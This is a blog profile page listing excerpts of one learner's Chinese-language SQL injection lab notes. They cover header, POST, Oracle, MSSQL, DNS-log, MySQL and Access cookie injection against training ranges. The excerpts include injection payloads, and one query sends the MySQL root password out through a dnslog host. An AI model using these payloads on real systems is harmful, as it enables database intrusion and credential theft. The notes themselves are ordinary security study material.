Track 实习学员

qq514262650

0关注
0粉丝
18文章
返回网站首页

您已发布 18篇文章作品写文章

纯情 Header注入Rank 1-3

打开靶场链接1.headre注入 先登录账号密码zkz查询返回信息Your User Agent is: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0 得到数据。 在这里我这使用了火狐浏览器插件hack 尝试在User Agent中注入 uname=zkz&passwd=zkz&

 2019-2-13
 0 
 38 

纯情 Post注入Rank1-3笔记

打开靶场网址1.先在表单Username和Passwrod编辑框输入zkz,点登录查看返回状态 在看万能密码的返回状态'or 1=1#在用1' order by 10# 查询数据库返回结果的字段  最终试为1' order by 2# 2个字段然后查询当前数据库名1' union select 1,database()#   &nbsp

 2019-2-13
 0 
 23 

纯情 Oracle注入笔记

打开靶场链接http://o1.lab.aqlab.cn:81http://o1.lab.aqlab.cn:81/?id=1' 注意闭合CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))去查询关于主题的对应关键词 去查询关于主题的对应关键词,然后因为查询失败(应该是这个用户没有创建和查询的权限,默认情况

 2019-2-13
 0 
 23 

纯情 MSSQL注入 - 反弹注入

打开靶场 http://120.203.13.75:8150/MSSQL/?id=2利用老师提供的 免费空间服务器网站 创了一个MSSQL数据库服务器:SQL5006.webweb.com 数据库名称:DB_14A5E44_zkaq 登入帐号:DB_14A5E44_zkaq_admin 密码:123123123创数据库表CREATE table test(id int,name char(255)

 2019-2-13
 0 
 22 

纯情 MYSQL 注入 - Dns注入

打开靶场链接http://120.203.13.75:8120/index3.php 利用http://ceye.io 免费的dnslog平台 注册账号SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.mysql.ip.p

 2019-2-13
 0 
 32 

纯情 MYSQL 注入 - 全方位利用

打开靶场链接http://120.203.13.75:6815找到注入点http://120.203.13.75:6815/?id=1 http://120.203.13.75:6815/?id=1 and1=1  正常  and1=2 不正常 判断字段order by 2 正常  order by 3 不正常 这个我们 and 1=2 union select 1,

 2019-2-13
 0 
 12 

纯情 Access注入 — Cookie注入笔记

打开靶场 http://120.203.13.75:8001找到注入点http://120.203.13.75:8001/shownews.asp?id=171在参数id后面加上分号' 测试,发现对GET请求参数有做过滤:下面使用Firefox的HackBar插件尝试在cookie里进行注入首先将参数id=171放到cookie,然后点击Execute,发现页面依旧正常显示,此时,再将Co

 2019-2-13
 0 
 41